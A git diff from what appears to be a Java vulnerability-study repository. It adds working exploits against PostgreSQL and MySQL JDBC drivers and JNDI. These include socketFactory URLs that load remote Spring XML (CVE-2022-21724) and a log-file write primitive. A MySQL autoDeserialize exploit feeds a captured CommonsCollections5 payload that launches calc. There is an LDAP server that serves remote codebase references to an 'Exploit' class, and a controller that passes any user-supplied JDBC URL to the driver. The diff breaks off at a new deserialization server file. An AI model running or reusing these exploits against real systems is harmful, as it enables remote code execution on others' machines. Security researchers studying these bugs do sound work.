diff --git a/CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java b/CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java new file mode 100644 index 0000000..44d6f2d --- /dev/null +++ b/CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java @@ -0,0 +1,4 @@ +package com.read; + +public class FileRead { +} diff --git a/CodeAudit/BasicVulStudy/FileWRD/test.txt b/CodeAudit/BasicVulStudy/FileWRD/test.txt new file mode 100644 index 0000000..e69de29 diff --git a/JNDI/JNDI_vul/.gitignore b/JDBC/PostgreSql/.gitignore similarity index 100% rename from JNDI/JNDI_vul/.gitignore rename to JDBC/PostgreSql/.gitignore diff --git a/JNDI/JNDI_vul/.idea/.gitignore b/JDBC/PostgreSql/.idea/.gitignore similarity index 100% rename from JNDI/JNDI_vul/.idea/.gitignore rename to JDBC/PostgreSql/.idea/.gitignore diff --git a/hessian/HessianStudy/.idea/encodings.xml b/JDBC/PostgreSql/.idea/encodings.xml similarity index 100% rename from hessian/HessianStudy/.idea/encodings.xml rename to JDBC/PostgreSql/.idea/encodings.xml diff --git a/JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml b/JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml new file mode 100644 index 0000000..4df5f76 --- /dev/null +++ b/JDBC/PostgreSql/.idea/inspectionProfiles/Project_Default.xml @@ -0,0 +1,8 @@ + + + + \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/misc.xml b/JDBC/PostgreSql/.idea/misc.xml similarity index 84% rename from hessian/HessianStudy/.idea/misc.xml rename to JDBC/PostgreSql/.idea/misc.xml index 556467a..d23f859 100644 --- a/hessian/HessianStudy/.idea/misc.xml +++ b/JDBC/PostgreSql/.idea/misc.xml @@ -8,7 +8,7 @@ - + \ No newline at end of file diff --git a/JNDI/JNDI_vul/.idea/vcs.xml b/JDBC/PostgreSql/.idea/vcs.xml similarity index 100% rename from JNDI/JNDI_vul/.idea/vcs.xml rename to JDBC/PostgreSql/.idea/vcs.xml diff --git a/JDBC/PostgreSql/ascii.jar b/JDBC/PostgreSql/ascii.jar new file mode 100644 index 0000000..7561305 Binary files /dev/null and b/JDBC/PostgreSql/ascii.jar differ diff --git a/JDBC/PostgreSql/log.txt b/JDBC/PostgreSql/log.txt new file mode 100644 index 0000000..2d34e22 --- /dev/null +++ b/JDBC/PostgreSql/log.txt @@ -0,0 +1,10 @@ +九月 25, 2025 1:01:07 下午 org.postgresql.Driver connect +详细: Connecting with URL: jdbc:postgresql://FileWrite/?loggerLevel=DEBUG&loggerFile=log.txt +九月 25, 2025 1:11:13 下午 org.postgresql.jdbc.PgConnection +详细: PostgreSQL JDBC Driver 42.3.0 +九月 25, 2025 1:11:13 下午 org.postgresql.jdbc.PgConnection setDefaultFetchSize +详细: setDefaultFetchSize = 0 +九月 25, 2025 1:11:13 下午 org.postgresql.jdbc.PgConnection setPrepareThreshold +详细: setPrepareThreshold = 5 +九月 25, 2025 1:11:18 下午 org.postgresql.core.v3.ConnectionFactoryImpl openConnectionImpl +详细: Trying to establish a protocol version 3 connection to FileWrite:5432 diff --git a/JDBC/PostgreSql/origin.jar b/JDBC/PostgreSql/origin.jar new file mode 100644 index 0000000..86bf5fb Binary files /dev/null and b/JDBC/PostgreSql/origin.jar differ diff --git a/JDBC/PostgreSql/pom.xml b/JDBC/PostgreSql/pom.xml new file mode 100644 index 0000000..428bb21 --- /dev/null +++ b/JDBC/PostgreSql/pom.xml @@ -0,0 +1,30 @@ + + + 4.0.0 + + com.test + PostgreSql + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.springframework.boot + spring-boot-starter-web + 2.7.13 + + + org.postgresql + postgresql + 42.3.1 + + + + \ No newline at end of file diff --git a/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java new file mode 100644 index 0000000..a62fbd2 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java @@ -0,0 +1,17 @@ +package com.test; + +import org.postgresql.Driver; + +import java.sql.SQLException; + +public class DirectConnect { + public static void main(String[] args) throws SQLException { + Driver driver = new Driver(); + String url = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://127.0.0.1:7777/1.xml"; + String url1 = "jdbc:postgresql://127.0.0.1:7777/test/"; + String url2 = "jdbc:postgresql://FileWrite/?loggerLevel=DEBUG&loggerFile=D:/log.txt"; + String url3 = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=jar:file:///D:/postgre_origin.jar!/1.xml"; + String url4 = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=file:///D:/1.xml"; + driver.connect(url3, null); + } +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java b/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java new file mode 100644 index 0000000..7edaef0 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java @@ -0,0 +1,11 @@ +package com.test; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class StartApplication { + public static void main(String[] args) { + SpringApplication.run(StartApplication.class, args); + } +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java b/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java new file mode 100644 index 0000000..e0c0cde --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java @@ -0,0 +1,16 @@ +package com.test; + +import ch.qos.logback.core.util.FileUtil; + +import java.io.IOException; +import java.net.URLEncoder; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class UrlEncodeFile { + public static void main(String[] args) throws IOException { + byte[] bytes = Files.readAllBytes(Paths.get("./ascii.jar")); + String encode = URLEncoder.encode(new String(bytes), "utf-8"); + System.out.println(encode); + } +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java b/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java new file mode 100644 index 0000000..f19a25a --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java @@ -0,0 +1,28 @@ +package com.test.controller; + +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.ResponseBody; + +import java.io.PrintWriter; +import java.io.StringWriter; +import java.sql.DriverManager; + +@Controller +public class IndexController { + + @ResponseBody + @RequestMapping("/jdbc") + public String jdbc(String url) { + try { + DriverManager.getConnection(url); + + } catch (Exception e) { + StringWriter sw = new StringWriter(); + e.printStackTrace(new PrintWriter(sw)); + return sw.toString(); + } + return "done."; + } + +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java b/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java new file mode 100644 index 0000000..ca86bc7 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java @@ -0,0 +1,17 @@ +package com.test.exp; + +import org.postgresql.Driver; + +import java.sql.SQLException; + +// CVE-2022-21724 +// 写入的文件前后会有其他字符 +public class FileWrite { + public static void main(String[] args) throws SQLException { + String file = "file content"; + Driver driver = new Driver(); + String url1 = "jdbc:postgresql:///?loggerLevel=DEBUG&loggerFile=D:/log.txt&{{file}}"; + String replace = url1.replace("{{file}}", file); + driver.connect(replace, null); + } +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java b/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java new file mode 100644 index 0000000..8d153fa --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java @@ -0,0 +1,16 @@ +package com.test.exp; + +import org.postgresql.Driver; + +import java.sql.SQLException; + +// 本质是调用构造方法 +public class SocketFactory { + public static void main(String[] args) throws SQLException { + String url1 = "jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://127.0.0.1:7777/1.xml"; + String url2 = "jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=file:///D:/1.xml"; + String url3 = "jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=jar:file:///D:/1.jar!/1.xml"; + Driver driver = new Driver(); + driver.connect(url1, null); + } +} diff --git a/JDBC/PostgreSql/src/main/resources/application.yml b/JDBC/PostgreSql/src/main/resources/application.yml new file mode 100644 index 0000000..54b155f --- /dev/null +++ b/JDBC/PostgreSql/src/main/resources/application.yml @@ -0,0 +1,2 @@ +server: + port: 8081 \ No newline at end of file diff --git a/JDBC/mysql/.gitignore b/JDBC/mysql/.gitignore new file mode 100644 index 0000000..f68d109 --- /dev/null +++ b/JDBC/mysql/.gitignore @@ -0,0 +1,29 @@ +### IntelliJ IDEA ### +out/ +!**/src/main/**/out/ +!**/src/test/**/out/ + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache +bin/ +!**/src/main/**/bin/ +!**/src/test/**/bin/ + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git a/hessian/HessianStudy/.idea/.gitignore b/JDBC/mysql/.idea/.gitignore similarity index 100% rename from hessian/HessianStudy/.idea/.gitignore rename to JDBC/mysql/.idea/.gitignore diff --git a/JDBC/mysql/.idea/compiler.xml b/JDBC/mysql/.idea/compiler.xml new file mode 100644 index 0000000..51e1d07 --- /dev/null +++ b/JDBC/mysql/.idea/compiler.xml @@ -0,0 +1,14 @@ + + + + + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/encodings.xml b/JDBC/mysql/.idea/encodings.xml new file mode 100644 index 0000000..29cf8bf --- /dev/null +++ b/JDBC/mysql/.idea/encodings.xml @@ -0,0 +1,9 @@ + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/jarRepositories.xml b/JDBC/mysql/.idea/jarRepositories.xml new file mode 100644 index 0000000..c364a09 --- /dev/null +++ b/JDBC/mysql/.idea/jarRepositories.xml @@ -0,0 +1,20 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/misc.xml b/JDBC/mysql/.idea/misc.xml new file mode 100644 index 0000000..fa904e2 --- /dev/null +++ b/JDBC/mysql/.idea/misc.xml @@ -0,0 +1,15 @@ + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/modules.xml b/JDBC/mysql/.idea/modules.xml new file mode 100644 index 0000000..be9deab --- /dev/null +++ b/JDBC/mysql/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/.idea/vcs.xml b/JDBC/mysql/.idea/vcs.xml new file mode 100644 index 0000000..b2bdec2 --- /dev/null +++ b/JDBC/mysql/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/SpringTarget/pom.xml b/JDBC/mysql/SpringTarget/pom.xml new file mode 100644 index 0000000..6f5daac --- /dev/null +++ b/JDBC/mysql/SpringTarget/pom.xml @@ -0,0 +1,25 @@ + + + 4.0.0 + + com.test + SpringTarget + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.springframework.boot + spring-boot-starter-web + 2.7.15 + + + + \ No newline at end of file diff --git a/JDBC/mysql/SpringTarget/src/main/resources/application.yml b/JDBC/mysql/SpringTarget/src/main/resources/application.yml new file mode 100644 index 0000000..be88d37 --- /dev/null +++ b/JDBC/mysql/SpringTarget/src/main/resources/application.yml @@ -0,0 +1,2 @@ +server: + port: 8085 \ No newline at end of file diff --git a/JDBC/mysql/YsoserialGadgetGenerate.bin b/JDBC/mysql/YsoserialGadgetGenerate.bin new file mode 100644 index 0000000..4bb9518 Binary files /dev/null and b/JDBC/mysql/YsoserialGadgetGenerate.bin differ diff --git a/JDBC/mysql/cc5.pcap b/JDBC/mysql/cc5.pcap new file mode 100644 index 0000000..854499a Binary files /dev/null and b/JDBC/mysql/cc5.pcap differ diff --git a/JDBC/mysql/final.pcap b/JDBC/mysql/final.pcap new file mode 100644 index 0000000..745f674 --- /dev/null +++ b/JDBC/mysql/final.pcap @@ -0,0 +1,16 @@ +J... +5.7.19.....F;E,-....................(QU>\#P,Q6j.mysql_native_password......................def..c.c.c.c.?................def..c.c.c.c.?.......................sr..javax.management.BadAttributeValueExpException....c-F@...L..valt..Ljava/lang/Object;xr..java.lang.Exception...>.;.....xr..java.lang.Throwable..5'9w.....L..causet..Ljava/lang/Throwable;L. +detailMessaget..Ljava/lang/String;[. +stackTracet..[Ljava/lang/StackTraceElement;L..suppressedExceptionst..Ljava/util/List;xpq.~..pur..[Ljava.lang.StackTraceElement;.F*<<."9...xp...'sr..java.lang.StackTraceElementa ..&6.....I. +lineNumberL..declaringClassq.~..L..fileNameq.~..L. +methodNameq.~..xp...Dt./me.l0tus.ysoserial.payloads.CommonsCollections5t..CommonsCollections5.javat. getObjectsq.~.....0q.~. +q.~..q.~..sq.~......t..ysoserial.gui.YsoForm$1t..YsoForm.javat..actionPerformedsq.~......t..javax.swing.AbstractButtont..AbstractButton.javat..fireActionPerformedsq.~.... ,t."javax.swing.AbstractButton$Handlerq.~..q.~..sq.~......t..javax.swing.DefaultButtonModelt..DefaultButtonModel.javaq.~..sq.~......q.~..q.~..t. +setPressedsq.~......t.*javax.swing.plaf.basic.BasicButtonListenert..BasicButtonListener.javat. +mouseReleasedsq.~......t..java.awt.Componentt..Component.javat..processMouseEventsq.~......t..javax.swing.JComponentt..JComponent.javaq.~.'sq.~......q.~.%q.~.&t..processEventsq.~......t..java.awt.Containert..Container.javaq.~.,sq.~......q.~.%q.~.&t..dispatchEventImplsq.~......q.~..q.~./q.~.1sq.~.....gq.~.%q.~.&t. +dispatchEventsq.~.....(t..java.awt.LightweightDispatcherq.~./t..retargetMouseEventsq.~......q.~.6q.~./q.~.'sq.~.....|q.~.6q.~./q.~.4sq.~......q.~..q.~./q.~.1sq.~.... +.t..java.awt.Windowt..Window.javaq.~.1sq.~.....gq.~.%q.~.&q.~.4sq.~......t..java.awt.EventQueuet..EventQueue.javaq.~.1sq.~.....aq.~.@q.~.At. +access$500sq.~......t..java.awt.EventQueue$3q.~.At..runsq.~......q.~.Eq.~.Aq.~.Fsq.~......t..java.security.AccessControllert..AccessController.javat..doPrivilegedsq.~.....Jt.5java.security.ProtectionDomain$JavaSecurityAccessImplt..ProtectionDomain.javat..doIntersectionPrivilegesq.~.....Tq.~.Mq.~.Nq.~.Osq.~......t..java.awt.EventQueue$4q.~.Aq.~.Fsq.~......q.~.Rq.~.Aq.~.Fsq.~......q.~.Iq.~.Jq.~.Ksq.~.....Jq.~.Mq.~.Nq.~.Osq.~......q.~.@q.~.Aq.~.4sq.~......t..java.awt.EventDispatchThreadt..EventDispatchThread.javat..pumpOneEventForFilterssq.~.....tq.~.Xq.~.Yt..pumpEventsForFiltersq.~.....iq.~.Xq.~.Yt..pumpEventsForHierarchysq.~.....eq.~.Xq.~.Yt. +pumpEventssq.~.....]q.~.Xq.~.Yq.~.`sq.~.....Rq.~.Xq.~.Yq.~.Fsr.&java.util.Collections$UnmodifiableList..%1.......L..listq.~..xr.,java.util.Collections$UnmodifiableCollection.B...^.....L..ct..Ljava/util/Collection;xpsr..java.util.ArrayListx.....a....I..sizexp....w.....xq.~.hxsr.4org.apache.commons.collections.keyvalue.TiedMapEntry....9......L..keyq.~..L..mapt..Ljava/util/Map;xpt..foosr.*org.apache.commons.collections.map.LazyMapn....y.....L..factoryt.,Lorg/apache/commons/collections/Transformer;xpsr.:org.apache.commons.collections.functors.ChainedTransformer0...(z.....[. +iTransformerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons.collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.functors.ConstantTransformerXv..A......L. iConstantq.~..xpvr..java.lang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTransformer...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNameq.~..[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t. +getRuntimeur..[Ljava.lang.Class;......Z....xp....t. getMethoduq.~......vr..java.lang.String...8z;.B...xpvq.~..sq.~.yuq.~.}....puq.~.}....t..invokeuq.~......vr..java.lang.Object...........xpvq.~.}sq.~.yuq.~.}....ur..[Ljava.lang.String;..V...{G...xp....t..cmd.exet../ct..calct..execuq.~......vq.~..sq.~.usr..java.lang.Integer.......8...I..valuexr..java.lang.Number...........xp....sr..java.util.HashMap......`....F. +loadFactorI. thresholdxp?@......w.........xx......."... \ No newline at end of file diff --git a/JDBC/mysql/hex.bin b/JDBC/mysql/hex.bin new file mode 100644 index 0000000..e69de29 diff --git a/JDBC/mysql/hex.pcap b/JDBC/mysql/hex.pcap new file mode 100644 index 0000000..fea6256 Binary files /dev/null and b/JDBC/mysql/hex.pcap differ diff --git a/JDBC/mysql/hex1.bin b/JDBC/mysql/hex1.bin new file mode 100644 index 0000000..e69de29 diff --git a/JDBC/mysql/hex1.pcap b/JDBC/mysql/hex1.pcap new file mode 100644 index 0000000..4bb9518 Binary files /dev/null and b/JDBC/mysql/hex1.pcap differ diff --git a/JDBC/mysql/mysql.iml b/JDBC/mysql/mysql.iml new file mode 100644 index 0000000..c90834f --- /dev/null +++ b/JDBC/mysql/mysql.iml @@ -0,0 +1,11 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/mysql/mysql.pcap b/JDBC/mysql/mysql.pcap new file mode 100644 index 0000000..ba88bb9 Binary files /dev/null and b/JDBC/mysql/mysql.pcap differ diff --git a/hessian/dubbo/pom.xml b/JDBC/mysql/no-outbound/pom.xml similarity index 66% rename from hessian/dubbo/pom.xml rename to JDBC/mysql/no-outbound/pom.xml index 620f038..136d7a3 100644 --- a/hessian/dubbo/pom.xml +++ b/JDBC/mysql/no-outbound/pom.xml @@ -4,8 +4,8 @@ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 - org.example - dubbo + com.test + no-outbound 1.0-SNAPSHOT @@ -16,14 +16,15 @@ - com.caucho - hessian - 4.0.63 + mysql + mysql-connector-java + 5.1.47 - org.apache.dubbo - dubbo - 2.7.6 + commons-collections + commons-collections + 3.2.1 + \ No newline at end of file diff --git a/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java b/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java new file mode 100644 index 0000000..11cf983 --- /dev/null +++ b/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java @@ -0,0 +1,20 @@ +package exp; + +import java.sql.Connection; +import java.sql.DriverManager; +import java.sql.SQLException; + +public class Exp { + public static void main(String[] args) throws SQLException { + String url = "jdbc:mysql://127.0.0.1:3307/test?autoDeserialize=yes&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=root"; + String noOutBound = "jdbc:mysql://127.0.0.1:3307/test?autoDeserialize=yes&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=root&socketFactory=com.mysql.jdbc.NamedPipeSocketFactory&namedPipePath=hex.pcap"; + String username = "root"; + String password = "root"; + try (Connection connection = DriverManager.getConnection(noOutBound, username, password)) { + System.out.println("数据库连接成功!"); + } catch (SQLException e) { + System.out.println("数据库连接失败!"); + e.printStackTrace(); + } + } +} diff --git a/JDBC/mysql/no-outbound/target/classes/exp/Exp.class b/JDBC/mysql/no-outbound/target/classes/exp/Exp.class new file mode 100644 index 0000000..dbd3edc Binary files /dev/null and b/JDBC/mysql/no-outbound/target/classes/exp/Exp.class differ diff --git a/JNDI/JNDI/.idea/copilot.data.migration.agent.xml b/JNDI/JNDI/.idea/copilot.data.migration.agent.xml new file mode 100644 index 0000000..4ea72a9 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/copilot.data.migration.ask.xml b/JNDI/JNDI/.idea/copilot.data.migration.ask.xml new file mode 100644 index 0000000..7ef04e2 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.ask.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml b/JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml new file mode 100644 index 0000000..1f2ea11 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/copilot.data.migration.edit.xml b/JNDI/JNDI/.idea/copilot.data.migration.edit.xml new file mode 100644 index 0000000..8648f94 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.edit.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/misc.xml b/JNDI/JNDI/.idea/misc.xml index 8345e46..805d844 100644 --- a/JNDI/JNDI/.idea/misc.xml +++ b/JNDI/JNDI/.idea/misc.xml @@ -8,7 +8,7 @@ - + \ No newline at end of file diff --git a/JNDI/JNDI_vul/.idea/uiDesigner.xml b/JNDI/JNDI/.idea/uiDesigner.xml similarity index 100% rename from JNDI/JNDI_vul/.idea/uiDesigner.xml rename to JNDI/JNDI/.idea/uiDesigner.xml diff --git a/JNDI/JNDI/.idea/vcs.xml b/JNDI/JNDI/.idea/vcs.xml index b2bdec2..64713b8 100644 --- a/JNDI/JNDI/.idea/vcs.xml +++ b/JNDI/JNDI/.idea/vcs.xml @@ -2,5 +2,6 @@ + \ No newline at end of file diff --git a/JNDI/JNDI/ClassByteGen/AAAA.class b/JNDI/JNDI/ClassByteGen/AAAA.class new file mode 100644 index 0000000..0a0e726 Binary files /dev/null and b/JNDI/JNDI/ClassByteGen/AAAA.class differ diff --git a/JNDI/JNDI/com/sun/proxy/$Proxy0.class b/JNDI/JNDI/com/sun/proxy/$Proxy0.class new file mode 100644 index 0000000..8592ed3 Binary files /dev/null and b/JNDI/JNDI/com/sun/proxy/$Proxy0.class differ diff --git a/JNDI/JNDI/com/sun/proxy/$Proxy1.class b/JNDI/JNDI/com/sun/proxy/$Proxy1.class new file mode 100644 index 0000000..258a627 Binary files /dev/null and b/JNDI/JNDI/com/sun/proxy/$Proxy1.class differ diff --git a/JNDI/JNDI/pom.xml b/JNDI/JNDI/pom.xml index fa7063a..1a7687f 100644 --- a/JNDI/JNDI/pom.xml +++ b/JNDI/JNDI/pom.xml @@ -4,7 +4,7 @@ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 - com.example + com.test JNDI 1.0-SNAPSHOT @@ -14,12 +14,47 @@ UTF-8 - - - com.unboundid - unboundid-ldapsdk - 3.2.0 - - + + + com.alibaba + fastjson + 1.2.47 + + + org.javassist + javassist + 3.30.2-GA + + + org.slf4j + slf4j-api + 2.0.17 + + + org.apache.tomcat.embed + tomcat-embed-core + 9.0.38 + + + com.h2database + h2 + 2.3.232 + + + org.hsqldb + hsqldb + 2.7.3 + + + com.alibaba + druid + 1.2.23 + + + com.unboundid + unboundid-ldapsdk + 3.2.0 + + \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java b/JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java deleted file mode 100644 index 4118c5a..0000000 --- a/JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java +++ /dev/null @@ -1,36 +0,0 @@ -package JNDI_Develop; - -import javax.naming.Context; -import javax.naming.NamingException; -import javax.naming.directory.Attributes; -import javax.naming.directory.DirContext; -import javax.naming.directory.InitialDirContext; -import java.util.Hashtable; - - -public class DNSContextFactoryTest { - public static void main(String[] args) { - // 创建环境变量对象 - Hashtable env = new Hashtable(); - - // 设置JNDI初始化工厂类名 - env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.dns.DnsContextFactory"); - - // 设置JNDI提供服务的URL地址，这里可以设置解析的DNS服务器地址 - env.put(Context.PROVIDER_URL, "dns://114.114.114.114/"); - - try { - // 创建JNDI目录服务对象 - DirContext context = new InitialDirContext(env); - - // 获取DNS解析记录测试 - Attributes attrs1 = context.getAttributes("baidu.com", new String[]{"A"}); - Attributes attrs2 = context.getAttributes("qq.com", new String[]{"A"}); - - System.out.println(attrs1); - System.out.println(attrs2); - } catch (NamingException e) { - e.printStackTrace(); - } - } -} diff --git a/JNDI/JNDI_vul/client/src/main/java/InitialC.java b/JNDI/JNDI/src/main/java/JndiClient.java similarity index 53% rename from JNDI/JNDI_vul/client/src/main/java/InitialC.java rename to JNDI/JNDI/src/main/java/JndiClient.java index 4203ca3..6b264e7 100644 --- a/JNDI/JNDI_vul/client/src/main/java/InitialC.java +++ b/JNDI/JNDI/src/main/java/JndiClient.java @@ -1,9 +1,11 @@ import javax.naming.InitialContext; import javax.naming.NamingException; -public class InitialC { +public class JndiClient { public static void main(String[] args) throws NamingException { + String rmiHost = "rmi://127.0.0.1:1099/Calc123"; + String ldapHost = "ldap://127.0.0.1:1389/anything"; InitialContext initialContext = new InitialContext(); - initialContext.lookup("ldap://127.0.0.1:1389/Calc"); + initialContext.lookup(ldapHost); } } diff --git a/JNDI/JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java b/JNDI/JNDI/src/main/java/LDAP/codebaseServer.java similarity index 81% rename from JNDI/JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java rename to JNDI/JNDI/src/main/java/LDAP/codebaseServer.java index 12d93df..726fd3d 100644 --- a/JNDI/JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java +++ b/JNDI/JNDI/src/main/java/LDAP/codebaseServer.java @@ -1,11 +1,5 @@ -package normal_ldap; +package LDAP; -import java.net.InetAddress; -import java.net.MalformedURLException; -import java.net.URL; -import javax.net.ServerSocketFactory; -import javax.net.SocketFactory; -import javax.net.ssl.SSLSocketFactory; import com.unboundid.ldap.listener.InMemoryDirectoryServer; import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; import com.unboundid.ldap.listener.InMemoryListenerConfig; @@ -15,25 +9,23 @@ import com.unboundid.ldap.sdk.LDAPException; import com.unboundid.ldap.sdk.LDAPResult; import com.unboundid.ldap.sdk.ResultCode; +import javax.net.ServerSocketFactory; +import javax.net.SocketFactory; +import javax.net.ssl.SSLSocketFactory; +import java.net.InetAddress; +import java.net.MalformedURLException; +import java.net.URL; -/** - * LDAP server implementation returning JNDI references - * - * @author mbechler - * - */ -public class JNDILdapServer { - +public class codebaseServer { private static final String LDAP_BASE = "dc=example,dc=com"; - public static void main (String[] args) { - int port = 1389; String url = "http://127.0.0.1:7777/#Calc"; + int port = 1389; try { InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE); config.setListenerConfigs(new InMemoryListenerConfig( - "listen", //$NON-NLS-1$ - InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$ + "listen", + InetAddress.getByName("0.0.0.0"), port, ServerSocketFactory.getDefault(), SocketFactory.getDefault(), @@ -41,32 +33,23 @@ public static void main (String[] args) { config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url))); InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); - System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$ + System.out.println("Listening on 0.0.0.0:" + port); ds.startListening(); - } catch ( Exception e ) { e.printStackTrace(); } } - private static class OperationInterceptor extends InMemoryOperationInterceptor { - private URL codebase; - /** - * - */ - public OperationInterceptor ( URL cb ) { + * */ public OperationInterceptor ( URL cb ) { this.codebase = cb; } - /** * {@inheritDoc} - * - * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) - */ - @Override + * * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) + */ @Override public void processSearchResult ( InMemoryInterceptedSearchResult result ) { String base = result.getRequest().getBaseDN(); Entry e = new Entry(base); @@ -76,23 +59,22 @@ public void processSearchResult ( InMemoryInterceptedSearchResult result ) { catch ( Exception e1 ) { e1.printStackTrace(); } - } - protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException { URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl); - e.addAttribute("javaClassName", "Calc"); + e.addAttribute("javaClassName", "Exploit"); String cbstring = this.codebase.toString(); int refPos = cbstring.indexOf('#'); if ( refPos > 0 ) { cbstring = cbstring.substring(0, refPos); } e.addAttribute("javaCodeBase", cbstring); - e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$ + e.addAttribute("objectClass", "javaNamingReference"); e.addAttribute("javaFactory", this.codebase.getRef()); result.sendSearchEntry(e); result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); } + } } \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/LDAP/deserServer.java b/JNDI/JNDI/src/main/java/LDAP/deserServer.java new file mode 100644 